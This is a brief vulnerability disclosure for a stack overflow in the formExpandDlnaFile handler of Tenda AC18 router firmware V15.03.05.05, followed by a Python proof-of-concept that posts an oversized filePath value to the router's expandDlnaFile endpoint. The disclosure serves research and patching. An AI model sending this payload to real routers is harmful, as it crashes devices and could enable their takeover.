-
The device's official website: https://www.tenda.com.cn/product/overview/AC18.html
-
Firmware download website: https://www.tenda.com.cn/download/detail-2610.html
V15.03.05.05
The Tenda AC18 V15.03.05.05 firmware has a stack overflow vulnerability in the formExpandDlnaFile function. The v18 variable receives the filePath parameter from a POST request. The value is directly used in a sprintf function and passes to a local variable on the stack, which can override the return address of the function. The user-provided filePath can trigger this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/expandDlnaFile"
payload = b"a"*2000
data = {"filePath": payload}
response = requests.post(url, data=data)
print(response.text)